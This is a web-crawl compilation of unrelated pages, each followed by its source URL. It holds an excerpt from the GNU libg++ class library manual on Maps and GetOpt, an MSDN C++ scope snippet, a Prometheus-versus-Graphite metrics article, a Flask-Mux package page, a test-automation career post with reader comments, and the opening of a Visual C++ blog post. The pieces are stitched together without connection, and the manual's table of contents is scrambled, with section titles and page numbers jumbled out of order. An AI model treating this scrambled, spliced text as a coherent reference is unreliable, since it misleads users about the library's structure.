     returns the Pix of the first item in the Bag or 0 if the Bag is empty.
For ordered Bags, this is the Pix of the least element.

a.next(ind)
     advances ind to the Pix of the next element, or 0 if there are no more.
ind = a.seek(x, Pix from = 0)
     Sets ind to the Pix of the next occurrence of x, or 0 if there are none. If from is 0, the first occurrence is returned, else the occurrence following from.

36 Map Class Prototypes

Maps support associative array operations (insertion, deletion, and membership of records based on an associated key). They require the specification of two types, the key type and the contents type. These are currently implemented in several ways, differing in representation strategy, algorithmic efficiency, and appropriateness for various tasks. (Listed next to each are average (followed by worst-case, if different) time complexities for [a] accessing (via op [], contains) and [d] deleting elements.)

 - AVLMaps implement ordered Maps via threaded AVL trees. ([a O(log n)], [d O(log n)])
 - RAVLMaps are similar, but also maintain ranking information, used via ranktoPix(int r), which returns the Pix of the item at rank r, and rank(key), which returns the rank of the corresponding item. ([a O(log n)], [d O(log n)])
 - SplayMaps implement ordered Maps via Sleator and Tarjan's (JACM 1985) splay trees. The algorithms use a version of "simple top-down splaying" (described on page 669 of the article). (Amortized: [a O(log n)], [d O(log n)])
 - VHMaps implement unordered Maps via hash tables. The tables are automatically resized when their capacity is exhausted. ([a O(1)/O(n)], [d O(1)/O(n)])
 - CHMaps implement unordered Maps via chained hash tables. ([a O(1)/O(n)], [d O(1)/O(n)])

The different implementations differ in whether their constructors require an argument specifying their initial capacity. Initial capacities are required for hash table based Maps. If none is given, DEFAULT_INITIAL_CAPACITY (from `<T>defs.h') is used.
All Map classes share the following operations (for some Map class, Map instance d, Pix ind, key variable k, and contents variable x). Pix-based operations are more fully described in the section on Pixes. See Chapter 9 [Pix], page 31.

Map d(x); or Map d(x, int initial_capacity)
     Declare d to be an empty Map. The required argument, x, specifies the default contents, i.e., the contents of an otherwise uninitialized location. The second version, specifying initial capacity, is allowed for Maps with an initial capacity argument.
d.empty()
     returns true if d contains no items.
d.length()
     returns the number of items in d.
d[k]
     returns a reference to the contents of the item with key k. If no such item exists, it is installed with the default contents. Thus d[k] = x installs x, and x = d[k] retrieves it.
d.contains(k)
     returns true if an item with key field k exists in d.
d.del(k)
     deletes the item with key k.
d.clear()
     deletes all items from the table.
x = d.dflt()
     returns the default contents.
k = d.key(ind)
     returns a reference to the key at Pix ind.
x = d.contents(ind)
     returns a reference to the contents at Pix ind.
ind = d.first()
     returns the Pix of the first element in d, or 0 if d is empty.
d.next(ind)
     advances ind to the next element, or 0 if there are no more.
ind = d.seek(k)
     returns the Pix of the element with key k, or 0 if k is not in d.

37 C++ version of the GNU getopt function

The GetOpt class provides an efficient and structured mechanism for processing command-line options from an application program. The sample program fragment below illustrates a typical use of the GetOpt class for some hypothetical application program:

#include <stdio.h>
#include <GetOpt.h>
//...
int debug_flag, compile_flag, size_in_bytes;
//...
while ((option_char = getopt (argc, argv, "dcs:")) != EOF)
  {
    // ...
  }

Along with the GetOpt constructor and int operator ()(void), the other relevant elements of class GetOpt are:

char *optarg
     Used for communication from operator ()(void) to the caller. When operator ()(void) finds an option that takes an argument, the argument value is stored here.
int optind
     Index in argv of the next element to be scanned. This is used for communication to and from the caller and for communication between successive calls to operator ()(void). When operator ()(void) returns EOF, this is the index of the first of the non-option elements that the caller should itself scan. Otherwise, optind communicates from one call to the next how much of argv has been scanned so far.

The libg++ version of GetOpt acts like standard UNIX getopt for the calling routine, but it behaves differently for the user, allowing flexible argument order. Setting the environment variable POSIX_OPTION_ORDER disables permutation. Then the behavior is completely standard.

38 Projects and other things left to do

38.1 Coming Attractions

Some things that will probably be available in libg++ in the near future:

 - Revamped C-compatibility header files that will be compatible with the forthcoming (ANSI-based) GNU libc.a.
 - A revision of the File-based classes that will use the GNU stdio library, and also be 100% compatible (even at the streambuf level) with the AT&T 2.0 stream classes.
 - Additional container class prototypes.
 - Generic Matrix class prototypes.
 - A task package, probably based on Dirk Grunwald's threads package.

38.2 Wish List

Some things that people have mentioned that they would like to see in libg++, but for which there have not been any offers:

 - A method to automatically convert or incorporate libg++ classes so they can be used directly in Gorlen's OOPS environment.
 - A class browser.
 - A better general exception-handling strategy.
 - Better documentation.
38.3 How to contribute

Programmers who have written C++ classes that they believe to be of general interest are encouraged to write to dl at rocky.oswego.edu. Contributing code is not difficult. Here are some general guidelines:

 - FSF must maintain the right to accept or reject potential contributions. Generally, the only reasons for rejecting contributions are cases where they duplicate existing or nearly-released code, contain unremovable specific machine dependencies, or are somehow incompatible with the rest of the library.
 - Acceptance of contributions means that the code is accepted for adaptation into libg++. FSF must reserve the right to make various editorial changes in code. Very often, this merely entails formatting, maintenance of various conventions, etc. Contributors are always given authorship credit and shown the final version for approval.
 - Contributors must assign their copyright to FSF via a form sent out upon acceptance. Assigning copyright to FSF ensures that the code may be freely distributed.
 - Assistance in providing documentation, test files, and debugging support is strongly encouraged.

Extensions, comments, and suggested modifications of existing libg++ features are also very welcome.

Table of Contents

GNU LIBRARY GENERAL PUBLIC LICENSE
  Preamble  1
  TERMS AND CONDITIONS FOR COPYING, DISTRIBUTION AND MODIFICATION  2
  How to Apply These Terms to Your New Libraries  8
Contributors to GNU C++ library  9
1 Installing GNU C++ library  11
2 Trouble in Installation  13
3 GNU C++ library aims, objectives, and limitations  15
4 GNU C++ library stylistic conventions  17
5 Support for representation invariants  19
6 Introduction to container class prototypes  21
  6.1 Example  23
7 Variable-Sized Object Representation  27
8 Some guidelines for using expression-oriented classes  29
9 Pseudo-indexes  31
10 Header files for interfacing C++ to C  33
11 Utility functions for built in types  35
12 Library dynamic allocation primitives  37
13 The new input/output classes  39
14 The old I/O library  41
  14.1 File-based classes  41
  14.2 Basic IO  41
  14.3 File Control  42
  14.4 File Status  42
15 The Obstack class  45
16 The AllocRing class  49
17 The String class  51
  17.1 Constructors  51
  17.2 Examples  52
  17.3 Comparing, Searching and Matching  53
  17.4 Substring extraction  54
  17.5 Concatenation  55
  17.6 Other manipulations  56
  17.7 Reading, Writing and Conversion  56
18 The Integer class  59
19 The Rational Class  63
20 The Complex class  65
21 Fixed precision numbers  67
22 Classes for Bit manipulation  69
  22.1 BitSet  69
  22.2 BitString  72
23 Random Number Generators and related classes  75
  23.1 RNG  75
  23.2 ACG  75
  23.3 MLCG  76
  23.4 Random  76
  23.5 Binomial  76
  23.6 Erlang  77
  23.7 Geometric  77
  23.8 HyperGeometric  77
  23.9 NegativeExpntl  77
  23.10 Normal  77
  23.11 LogNormal  77
  23.12 Poisson  77
  23.13 DiscreteUniform  78
  23.14 Uniform  78
  23.15 Weibull  78
  23.16 RandomInteger  78
24 Data Collection  79
  24.1 SampleStatistic  79
  24.2 SampleHistogram  79
25 Curses-based classes  81
26 List classes  83
  26.1 Constructors and assignment  83
  26.2 List status  83
  26.3 heads and tails  84
  26.4 Constructive operations  84
  26.5 Destructive operations . . .
. . . . . . . . . . . . HyperGeometric . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . NegativeExpntl . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . Normal . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . LogNormal . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . Poisson . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . DiscreteUniform . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . Uniform . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . Weibull . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . RandomInteger . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 59 63 65 67 69 75 75 75 76 76 76 77 77 77 77 77 77 77 78 78 78 78 24 Data Collection 25 Curses-based classes 26 List classes 26.1 26.2 26.3 26.4 26.5 26.6 24.1 SampleStatistic . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 79 24.2 SampleHistogram . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 79 ............................. .................................. 79 81 83 iii 27 Linked Lists 28.1 28.2 28.3 28.4 28.5 28.6 Constructors and assignment . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 83 List status . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 83 heads and tails . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 84 Constructive operations . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 84 Destructive operations . . . . . . . . . . . . . . . . 
. . . . . . . . . . . . . . . . . . . . . . . . 85 Other operations . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 85 ...................................... ....................................... 28 Vector classes 27.1 Doubly linked lists . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 88 .................................... 87 89 29 30 31 32 33 34 35 36 37 Plex classes Stacks Queues Double ended Queues Priority Queue class prototypes. Set class prototypes Bag class prototypes Map Class Prototypes C++ version of the GNU getopt function Constructors and assignment . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 89 Status and access . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 89 Constructive operations . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 90 Destructive operations . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 90 Other operations . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 90 AVec operations. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 91 ...................................... ............................................ ........................................... .......................... ............... ............................ ............................ .......................... ....... 93 97 99 101 103 105 107 109 111 iv 38 Projects and other things left to do User's Guide to the GNU C++ Class Library ............ 38.1 Coming Attractions . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 113 38.2 Wish List . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 113 38.3 How to contribute . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 
113 113
https://www.scribd.com/document/3400539/User-s-Guide-to-the-GNU-C-Library
C++ scope examples:

    { int i; }                      // block scope
    class Point { int x; int y; }; // class scope
    errno_t strcpy_s( char *strDestination, size_t numberOfElements, const char *strSource );  // function prototype scope

Names declared within a namespace block have namespace scope and can be accessed using the scope operator namespace::name. Example:

    namespace X { int t; }
    int const soXt(sizeof X::t);

The same rule applies to names in class scope, with the additional restriction that nonstatic members must be attached to an object of class type, as demonstrated below.

    Point p;
    int (&px)(p.Point::x);

Instead of

    static Point p;
    static int size(List& l);

use an unnamed namespace to get the same result:

    namespace {
        Point p;
        int size(List& l);
    }
http://msdn.microsoft.com/en-us/library/b7kfh662(VS.80).aspx
Hey everyone, in this article of the Tooling in DevOps series we will talk about how we can save our monitoring metrics and use them to visualize in fancy graphs. Let's say we have metrics of how much time our servers are taking to serve each request, and we want to save them in a time-series database so that we can plot them later. What mechanisms can we use to save this data, and which one is useful in which scenario?

Pull vs Push

We have two mechanisms to save our data in our database. In the push mechanism, we push our data to the database whenever it is available. In pull mode we just expose our data for consumption, and our database keeps polling for this data and saves it on each attempt.

Where is Pull useful?

This is useful when you want your database to decide when to get the data. It needs a continuously running server that exposes your metrics on a port, from which your database can fetch the metrics.

Where is Push useful?

Push is useful mostly in short-running tasks where you don't want to run a continuous server just to expose the metrics to the database.

What can you use for a pull-based model?

Prometheus is very useful for the pull-based model. You can expose your metrics on a server and port, define the endpoint in your Prometheus server, and it will pull the metrics at the intervals you have defined.

What can you use for a push-based model?

Graphite is a good option if you want to push metrics from your application. Graphite exposes a port to which you can send the data, and it will save it.

Python code to expose data to Prometheus

    from prometheus_client import start_http_server, Summary
    import random
    import time

    # Create a metric to track time spent processing requests.
    REQUEST_TIME = Summary('request_processing_seconds',
                           'Time spent processing a request')

    @REQUEST_TIME.time()
    def process_request(t):
        """A dummy function that takes some time."""
        time.sleep(t)

    if __name__ == '__main__':
        # Start up the server to expose the metrics.
        start_http_server(8000)
        # Generate some requests.
        while True:
            process_request(random.random())

This is the simple example from the Prometheus Python client. You can run this and it will expose data to be consumed; you can see it in your browser at localhost:8000.

Python code to send data to Graphite

    import graphyte
    graphyte.init('graphite.endpoint.com', prefix='system.sync')
    graphyte.send('foo.bar', 42)

It is far simpler to push data this way. By default, it pushes the data to port 2003. You can learn how to set up Graphite here. You can then visualize this data using Grafana. We will talk about Grafana in the next article and try to draw some fancy graphs. Till then, subscribe and stay updated.
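For the curious, what graphyte sends to port 2003 is Graphite's plaintext protocol: newline-terminated `metric value timestamp` records. A minimal formatting helper (a hypothetical stdlib-only sketch, not part of graphyte):

```python
import time

def graphite_line(metric, value, timestamp=None):
    """Format one datapoint in Graphite's plaintext protocol:
    '<metric.path> <value> <unix_timestamp>' plus a newline."""
    if timestamp is None:
        timestamp = int(time.time())
    return f"{metric} {value} {int(timestamp)}\n"

# The same datapoint graphyte.send('foo.bar', 42) would emit
# (graphyte prepends the configured prefix):
print(graphite_line("system.sync.foo.bar", 42, timestamp=1650000000))
```

Writing such lines to a TCP socket on port 2003 is all that "pushing to Graphite" means at the wire level.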
https://www.learnsteps.com/prometheus-vs-graphite/
Minimal routing extension for Flask

Project description

Flask-Mux is a lightweight Flask extension that provides a routing system similar to that of Express.js. It basically wraps Flask's URL route registration API to add more flexibility.

A Simple Example

    from flask import Flask
    from flask_mux import Mux, Router

    app = Flask(__name__)
    mux = Mux(app)

    def home():
        return 'home'

    def about():
        return 'about'

    index_router = Router()
    index_router.get('/', home)
    index_router.get('/about', about)

    mux.use('/', index_router)

Links

- Documentation:
- PyPI Releases:
- Source Code:
- Issue Tracker:
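To make the wiring concrete, here is a tiny standalone sketch of the idea behind `Router` and `mux.use()`: collect (method, path, view) tuples, then mount them under a prefix. This is an illustrative re-implementation, not Flask-Mux's actual internals, and it deliberately avoids the Flask dependency:

```python
# Toy re-implementation of the Router/Mux pattern for illustration only.
class Router:
    def __init__(self):
        self.routes = []          # (method, path, view_func) tuples

    def get(self, path, view_func):
        self.routes.append(('GET', path, view_func))

class Mux:
    def __init__(self):
        self.table = {}           # (method, full_path) -> view_func

    def use(self, prefix, router):
        # Mount every route of the router under the given prefix.
        for method, path, view in router.routes:
            full = (prefix.rstrip('/') + path) or '/'
            self.table[(method, full)] = view

    def dispatch(self, method, path):
        return self.table[(method, path)]()

r = Router()
r.get('/', lambda: 'home')
r.get('/about', lambda: 'about')
mux = Mux()
mux.use('/', r)
print(mux.dispatch('GET', '/about'))  # about
```

In the real extension, `mux.use()` performs the equivalent registration through Flask's `add_url_rule`, so the dispatch step is handled by Flask itself.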
https://pypi.org/project/Flask-Mux/
I'm really happy to share a wonderful guest post by Gunasekaran Veerapillai, who is working as a Competency Head in Wipro Technologies Testing Services. Gunasekaran covers an interesting transformation of the automation industry: how it was a few years ago and where it is heading now. He also answers one core question: do we need dedicated automation experts to do test automation, or can normal testers do automation as well? So please enjoy, and take it away, Gunasekaran!

"Test automation is no longer a niche skill": any good business tester with the right attitude can create test automation scripts.

Over the last decade test automation has undergone multiple facets of change. The same vendors have introduced new tools, open source tools have come to stay, and some vendors still market their products as the ultimate solution for quality. CTOs of organizations are convinced that automation is going to give them greater benefits in squeezing cost and time over the long run. Service providers have introduced several frameworks which save the effort of automation testers: from standard data-driven, keyword and hybrid frameworks to script-less frameworks whereby business users can create automation scripts without the hassle of Java or VB scripting knowledge. This ultimately leads us to the question: is a dedicated automation scripting community required, or can normal testers do automation as well? There are many articles stating that test automation should be group automation, not a dedicated, aligned team working on automation scripts and projects. When I was managing a test automation project in 2002, I was hunting for testers with a development background to be part of the team, as the tool created code in a proprietary language similar to "C". Any update to a script is easily done by a tester who has knowledge of the language.
Then came the automation frameworks, where expertise in the language helped the tester write the "reusable functions" which were expected to save considerable time for automation developers. Secondly, test automation developers were expected to convert already-written test cases into automation scripts; they were rarely expected to have the business knowledge to understand them in the right perspective before creating the scripts. Test automation as a preferred profession in software testing grew by leaps and bounds over the next few years, until the great recession struck us in 2008. Clients started questioning the ROI of the automation scripts developed over a period of time, and the reuse percentage of these scripts in subsequent releases. They were really shocked to see that in many cases test automation had not yielded the desired results, and that scripts required more maintenance to keep them LIVE against the current applications. Only a few clients, where the technology was web-centric, got excellent benefits in saving cost and time from automation.

Test Automation – Current Status:

1) From automating regression test cases, automation is moving towards life-cycle test automation. Clients have started exploring the various stages of the test life cycle which can be automated, with the right set of tools for automating such manual work.

2) Automation testers are expected to have good business knowledge with the advent of model-based testing. Clients cannot hire separate testers for creating the model and automating the test cases.

3) Business-process automated test packs help clients reduce the time to market for standard, established applications and products.

4) Clients are unable to choose tool vendors, as there are multiple boutique shops which offer customized frameworks and script-less automation frameworks.

5) Test management tools have been completely integrated with the test life cycle, and on-the-fly customized reports are generated.

6) Integration of different vendors' tools, in terms of requirements management, test management, test script execution and defect management, is easily managed by the team, which gives more flexibility in choosing the appropriate vendors and tools.

7) Multiple customized utilities which help testers reduce redundant manual work have been created and promoted as differentiators by independent testing vendors, and some are even priced on the value the client gets.

Let us come back to the question we asked at the beginning: is a dedicated automation tester required, or does automation still hold as a career ladder? While one can agree that test automation has become much simpler and a manual tester with good business knowledge can pick up automation, the expectation from an automation expert has moved to a different level. Anyone can execute test automation scripts created by an expert, but there are still different skill sets with deeper technical knowledge which cannot easily be acquired by a manual tester overnight.

To conclude, test automation experts will remain strong as technical professionals, though the standard redundant part of test automation (sounds familiar? history repeats) may get merged with group testing.

About the author – Gunasekaran Veerapillai (Guna) worked as a Test Project Manager at Thinksoft, HCL Technologies and Covansys (CSC). Currently he is working as Competency Head in Wipro Technologies Testing Services. With 30+ years of experience in the banking industry and IT, Guna specializes in test portfolio assessments, test process assessments and automation assessments for many BFSI clients. Guna has co-authored a book called Software Testing and Continuous Quality Improvement, Third Edition, along with Bill Lewis.
He also presents papers at international software quality conferences conducted by QAI.

Over to you: do you work, or want to work, in test automation? You must be facing some challenges in implementing an automation framework. Please do not hesitate to put your queries in the comments below; I'll make sure to get them addressed by Guna.

71 comments ↓

Agree, manual to automation expert can't happen overnight. But there is scope for business testers to become automation testers with the right attitude.

Well, while using open source tools which use a complete OO programming language, do you think that a non-IT guy can do the coding?

I am an automation engineer; usually I just create scripts with .NET from predefined test cases. I want to understand the lines below in more detail; can you please explain, or provide me some material regarding that? "Play & Record functionality cannot produce a complete automation script. The user needs to add scripting logic to enhance the automation script."

What is the scope of QTP and Selenium in the competitive market? Which should be preferred, and why?

Well said. Nice article. Thanks for sharing.

Nice article… I am working as a tester but with no automation. I have a little programming knowledge in C. Now if I have to take up testing as my career, what do I have to do? Should I take up a software testing course or something else? Please guide me. Thank you

What is the scope for a tester?

That was a really nice article. What is the scope for a non-IT guy who doesn't have programming knowledge as an automation tester? Will he be able to compete with automation testers who are from a programming background? And how will his future be?

I am working as a tester but with no automation. I have no knowledge of any programming language. Now if I have to take up testing as my career, what do I have to do? What do I have to learn to become an automation tester? Should I go for learning C and databases? Please guide.

Good article… I am working as a tester.
We will do only manul testing, I am interested in automation testing, I know to use the tolls like Qtp 9.2( using VB scripting)load runner etc.. and have programming knowledge also how can I move to automation pls guide me, also tell me we have good career in testing? hi , i am working as a manual tester and want to learn automation i have basic knowledge of java and selenium ide , i want to know from where i have to start automation HI, I was also in manual testing & recently a one & half year back i just transformed in to automation side.Now, I can say that i have some good automation skills. It’s all about attitude & how you take efforts to aquaire specific skills, it may involve high risk which can impact deliverables to client.But its all about how you do improvisation & deliver with minimum short-comings. keep learning & grab the knowledge,discuss with experienced automation experts on issues,observe small detail things,always ask questions..!!These factors are important to become automation expert..!! All d Best..!! Vishal (Next Time Don’t DO it,Automate it..!!) Hi I am working as a Manual tester and I want to learn Automation..I request you to guide me which automation tool should i learn? i want to learn open source tool. Tell me Good opensource tool Thanks ! Nice Article. Yes . I do agree that automation experts will remain strongly as a technical professionals. I do automation testing from last 1 & half year on Java & networking (with regression approach) its really a challenging job where you need to complete task with tight deadlines & have to do 100% analysis of failed case.For analysing failed cases one must have good knowledge of language with which tool has been developed. Hi Thanks for sharing useful article like this… I am working as a manual tester for mobile application. I am very interesting to learn automation tool.. So i startup with Apache-Jmeter testing tool, can u suggest please is it good one.. 
:-) Hi I would like to say this article the was posted on right time as the QA industry is moving fast from manual to automated testing or script generated testing. Having experience of 5 years working as manual tester now I am struggling to continue in this field because of lack of experience in automation tools. Fact is that now a days employers prefer testers only those who have some basic programming/coding skills . There is no question of can normal testers do automation if they are looking for a testing career then they must, Otherwise manual testers won’t survive long. It is a very good article. Though automation has become integral part of the STLC, there are projects where automation is being handled by specialized people. Especially, in agile environment, developers and automation specialists are supporting functional test automation. It is well said in the article “No client is ready to wait 6 to 8 cycles to get the return on investment”. Thanks for a nice article. @ zubair – Coding in these test automation skill does not require in depth knowledge on these languages. You can always pick up easily if you have right attitude to learn. I never had coding experience in the first 15 years of my life and I learnt all these over the last decade. @ Bharat – The role of automation experts has changed very much during the last few years. Automation architects are expected to give a cost effective solution which will give quicker ROI. As Risk based testing, we need to identfy the critical business secnarios which if automated will give continous and greater benefit to clients. Identifying the right set of testing tools and automating the entire test life cycle is expected from automation experts. @ Rajiv kumar singh – While QTP overrides seleniums’ area of coverage, selenium has established very well in the market – may be except BFSI clients, most of them started using selenium. 
While QTP is a commercial tool with good support , selenium is still depends on the open soruce community. @ vivek @ Lakshmi- Testing as an career is great. To become an automation expert learn tools like selenium and create scripts in the projects where you are working. Add value in the project and differentiate yourself. Thanks!! Good Article.. i was working as a manual tester.. now am automation tester.. Scripting is realy a different thing and very challenging job.. i enjoy doing scripting… The concept of automated testing well explained, currently working as PHP Developer looking for switch in Software testing ,let me know how my experience useful in software testing As I mentioned elsewhere, to become an automation tester, we need only basics of programming languages as the testing tool guides the developer. But you should continously work on this. Try automating some of your test cases using selenium. you will learn by yourself. Great article.. Put on here on right time. Encourages one to learn automation. Thank you…! Its a nice article and all other article which are posted in this site are also very helpful, this software testing help website is great. helping many people to choose the right field and answers their quires regarding testing.. i just want to say thanks to the founder of this site.. great work done sir g.. continue to doing that it help us a lot…. It’s really worth to see that most of the comments similar to others especially they recommend Selenium and QTP. Since Selenium available in Open Source Market, people prefer to select Selenium Tool. Thanks for your advice Guna, let me get into Selenium and will be back shortly with lot of questions. i’m fresher,i like to work in your company. Since I am fresher, so I don’t have any work experience. But I want to learn more with others and do my at level best. i know .net and i can work in that.. i update the resume in your sit .. please do me needful.. 
thank you Great article, i am interested in gaining test automation skills especially in selenium. will be back with questions, especially on automation Hi, I am Priyanka Sahu. I have one year experience in manual testing. I have all the basic knowledge of Vbscript , QTP, Advanced Qtp. QC. I want to be expertise in this area. I want to know whic are the certification or any other courses to make myself skilled in this area. I want to learn selenium and java also. Please reply to my answers. Priyanka Please undergo some training and practice. Certifications are costly and may not necessarily help you. You practical experience will come out in the interview which will help you. Selenium and java are good options. please proceed Gunasekaran Veerapillai Hi, Guna ur artical is good. I want to learn automation tool which one will help me in long stand is it QTP or SELENIUM/ Load runner – Which training center in chennai where i can get pratical training. Currently i jobless can u help me by giving ur valuable guidance. Thanks Hi started by career in it dept of bank and joing IT in manual testing in Banking domain. I have tested financial products one for backoffice reconciliation and another for transaction monitoring. This took me 5 years. Now, overall 7+ yrs in manual testing , very hard to find oppurtunities. If i decide to take automation, how my exp. would be counted? as there could be more numbers in automation industry? is it wise to takeup any automation tool now? then how my previous 7 yrs would be considered ? How much importance would be given to my exp 7yrs in manual & beginner in automation? Your expertise in testing carreer would help me in resolving my problem areas. THanks in advance Hello sir As I am working in testing field in mobile application company and i want to grow with the testing field and want to switch in the white box testing as i have done MCA having programming knowledge, please give me guide line to explore my testing career. 
Hi , I want to switch my career to testing and have no experience in testing . If i start with ISQTB and then learn those testing tools and languages can i get into this field. thanks for your help. SIR I KNOW THE THEORICAL CONCEPT OF JAVA AND CURRENTLY WORKING IN MANUAL TESTING. BUT I WANT TO LEARN SELENIUM AND LOADRUNNER.SO CAN I UNDERSTAND THE ALL THE CONCEPT WITHOUT CODING KNOWLEDGE??. PLEASE GIVE SUGGESTION.AND HOW MUCH PROGRAMMING KNOWLEDGE ARE REQUIRED TO LEARN THESE TOOLS AND APPLY ON SOME PROJECT Hi. I have 12 months of experince in manual testing.I know the basics of JAVA and SQL. Now i got opprtunity in 1.ETL Testing and 2.Automation testing ( SELENIUM ). Please advice which one to choose for better career growth. hi… I just completed my BTECH (ECE, 2012 PASSOUT, 69%).. so, can anyone tell me .. is it a good option to choose a software testing as a career for making money for skilled person .. do you feel its a interesting job & better option for making maoney, comapre to software developer???…. what might be the salary of an software test engineer wit 2 yrs of experience??.. I am working in software testing(manual) and want to shift in Automation with It background is it a fruitful decission for me?pls inform me and give me any suggestion how can i learn automation testing??if any institute address or something is given to me in kolkata i will be greatful to u. Thanking you Pradipta–IT–2011(B.tech) Hi, Nice artical. I just started to read about testing tools and i started to read manual testing. Please give an advice do i need to start on manual or Automation. I am working as a Manual Tester for Web sites from last 1 year. I have knowledge of C,PHP,MySQl. I want to get shifted into Automation. Which scripting language do i need to learn Pearl,Shell or any other. I need your guidance. Do i need to learn QTP/WinRunner/Load Runner. Please help me. 
Neeraj (M.Sc.(Computer Science)) 9922227448 too good article..thanks for the same..im in manual testing and surely above blog show me the way to move to autoamation… but please let me know, as my company dont have any automation tool..how one should move to manual to automation?? awaiting your reply..Thanks..;) what are the scope for a tester ? Hi , Nice article..i m in manual testing how can i improve myself in automation , if i know automation from outside means also how can i implement or show my knowledge in this field. Couldn’t agree more with the below lines – “Test automation experts are expected to give the overall automation strategy for the entire product/application life cycle – gone are the days when they were requested to automate the already finalized test cases or scenarios.” This is what I have been seeing from some time… Great Article Guna!!! I am a Manual Tester. Recently I have started learning Selenium. Let me tell you guys I don’t have any programming background. Still I find Selenium & Java are easy to learn and implement. Any of you planning to start Selenium, go for Selenium Webdriver. Its really great tool. I have fallen in love with it :) Hello, I am working as a Senior test engineer and testing mobile applications and that too manually. i am from electronics background and now my experience is around 4+ years.i am finding it difficult to change the domain as i have not got any automation experience , and also the knowledge of any programming language. it has been very haphazard situation for me.please let me know where to start from to get into automation and get in some good organization to enhance my skills. @Mohamed Shaikh, send me the link to download the selenium…. Good article :) Nice article…. I am working in a manual testing,coming from non it background,Is good future for qtp automation tool? hello, I am a SCJP(1.6), but recently while working i find testing, specially automated unit testing interesting. 
i am keen to know, is it a good option to have a shift from development to automated testing? if yes, how? if no, why??????????? I am working as a maual testing, i want to change from manual testing to automation testing…now Am learing php script and whether php is helpful for automated testing?plz guide me more detail @ Mohamed Shaikh – Hi Mohamed Shaikh, can u pass ur mail id or your contact number. i want to discuss about your experience in Web driver as we are planning to implement the same in our company. Sample selenium code for people interested to use Selenium package sampleTest; import org.testng.annotations.Test; import org.testng.annotations.BeforeClass; import org.testng.annotations.AfterClass; import com.thoughtworks.selenium.DefaultSelenium; import com.thoughtworks.selenium.Selenium; public class NewTest extends PhyWebTestBase{ protected Selenium sel; @Test public void start() { } @BeforeClass public void startServer() { sel = new DefaultSelenium(“localhost”,4444,”*firefox”,””); sel.start(); try { sel.open(“/”); sel.waitForPageToLoad(“30000”); } catch(Exception e) { } } @AfterClass public void stopserver() { sel.close(); sel.stop(); } } Hi, I am working as manual tester & want to switch to automation testing. Can you please suggest which tool is in most demand in India. I am thinking of taking Selenium tutorials. Kindly guide.Its urgent. Regards, Mona Hi, I am also working as an automation tester, but i know i am not good at it. i am wondering whether i should remain in manual, or not. Will i be able to pick up on these skills? i really get an inferiority complex when i see my other colleagues who r so good in automation. i am good at logic, and did wll in programming papers, but real time jobs are different ball game all together. please can u suggest me a solution / advice? 
I am really upset; can anyone give me a suggestion? I work in manual testing, so what type of testing course should I do so that I can move into automation testing? Reply urgent.

Hi Guna, I am a fresh graduate, and I am a test engineer now. What will be your advice on software automation? I don't have any experience with it yet. Thank you in advance :).
http://www.softwaretestinghelp.com/test-automation-specialized-career/
Hello, my name is Richard Russo. I'm the newest member of the Visual C++ compiler front-end developer team, having started in January. I'm not new to MS, though, as I spent the last three years working on Windows Vista. I'm excited to be on the front-end team because compiler development has been a hobby of mine for a few years. Most posts on this blog discuss new features that are added or what daily work is like here in various positions. Instead of that, I'd like to discuss my thoughts on a particular aspect of C/C++ that I think deserves more design attention: header files and the preprocessor. I'll probably be discussing a few hypothetical features here, and I just want to say up front that this does not necessarily mean the Visual C++ team will be working on or delivering these features. In writing up these ideas, mainly what I'm hoping to do is spark discussion and get your feedback. There should be a link below to leave comments, so please do!

First off, what are header files really for? Well, without doing research into the design rationale of Kernighan and Ritchie, the most basic purpose they serve is to allow us to maintain units of code for separate compilation in a declare-before-use language. You can imagine that without the preprocessor we'd have to declare the same things in every source file; we'd quickly get tired of that and probably hack something together that looks a lot like the current preprocessor. Sure, we use the preprocessor for lots of clever things, but to me that is its essential purpose.

What are some frustrations with header files? Well, they seem to contribute to really long build times. Have you ever used the preprocessor modes of cl.exe? You can access those with /E (preprocess to stdout), /P (preprocess to a file), and /EP (preprocess to a file, but don't produce #line directives). Give it a try: for instance, "cl /P foo.cpp" will produce "foo.i". On my system, I wrote a quick Windows "hello world" with the MessageBox function.
